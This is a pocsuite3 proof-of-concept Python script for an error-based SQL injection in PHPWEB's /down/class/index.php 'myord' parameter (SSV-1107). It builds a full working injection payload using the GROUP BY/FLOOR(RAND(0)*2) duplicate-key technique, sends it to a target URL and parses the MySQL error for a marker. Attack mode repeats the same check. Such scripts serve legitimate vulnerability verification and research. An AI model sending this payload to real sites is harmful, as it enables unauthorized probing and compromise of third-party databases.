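"""PoC for the PHPWEB ``/down/class/index.php`` ``myord`` SQL injection (SSV-1107).

If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
For more information, please visit http://pocsuite.org
"""
import re

from pocsuite3.api import Output, POCBase, register_poc, requests

# The payload wraps the injected expression in two hex-encoded tags:
# 0x7178656e71 == "qxenq" (prefix) and 0x7166747071 == "qftpq" (suffix), with
# the constant 1 in between. A duplicate-entry error that really comes from our
# query therefore contains "qxenq1qftpq"; any other 1062 error on the page does
# not, and must not be counted as a hit.
_MARKER = "qxenq1qftpq"

# MySQL error 1062 (duplicate GROUP BY key) as echoed by the target's error page.
# Raw string: "\/" and "\:" are invalid escape sequences in a normal literal
# (SyntaxWarning on recent Pythons); the compiled pattern is unchanged.
_ERROR_RE = re.compile(
    r"MySQL Error<\/b>\: 1062 \(Duplicate entry '(.*?)' for key 'group_key'"
)


class DemoPOC(POCBase):
    vulID = '1107'  # ssvid
    version = '1'
    author = ['chenghs@knownsec.com']
    vulDate = '2013-11-12'
    createDate = '2013-11-13'
    updateDate = '2013-11-13'
    references = ['http://sbqing.com/archives/944.html']
    name = 'phpweb /down/class/index.php SQL注入漏洞 POC'
    appPowerLink = 'http://www.phpweb.net/'
    appName = 'PHPWEB'
    appVersion = '#'
    vulType = 'SQL Injection'
    desc = '''
    phpweb /down/class/index.php 文件中以GET方式接受了一个参数myord作为SQL语句中order by $myord子句的参数,而且myord变量没有经过任何过滤,加上一个单引号后,发现程序报错。
    '''
    samples = []
    install_requires = ['']

    def _verify(self):
        """Probe the target and report whether ``myord`` is injectable.

        Sends an error-based payload and looks for MySQL error 1062 carrying
        the marker string from the payload.

        Returns:
            Output: success (with the echoed marker) when the target reflects
            the expected duplicate-entry error, failure otherwise.
        """
        result = {}
        # Error-based probe: GROUP BY over CONCAT(tag, 1, tag, FLOOR(RAND(0)*2))
        # makes MySQL raise error 1062, leaking the concatenated string in the
        # error message. Payload kept verbatim from the original PoC.
        payload = "/down/class/index.php?myord=1%20AND%20(SELECT%209913%20FROM(SELECT%20COUNT(*),CONCAT(0x7178656e71,(SELECT%20(CASE%20WHEN%20(9913=9913)%20THEN%201%20ELSE%200%20END)),0x7166747071,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)"
        # Avoid a doubled slash when the configured target already ends in "/".
        content = requests.get(self.url.rstrip('/') + payload).text
        res = _ERROR_RE.findall(content)
        # Require our marker inside the duplicate entry: a generic 1062 error on
        # the page would otherwise produce a false positive.
        if res and _MARKER in res[0]:
            result['Database'] = {}
            # NOTE: the value is the echoed marker string (proof the injected
            # expression was evaluated), not a real database name; the 'DBname'
            # key is kept for backward compatibility with existing consumers.
            result['Database']['DBname'] = res[0]
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in a pocsuite3 ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        """Attack mode performs the same non-destructive error-based check as verify."""
        return self._verify()

    def _shell(self):
        """Shell mode is not implemented for this PoC."""
        pass


register_poc(DemoPOC)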
暂无官方解决方案
暂无防护方案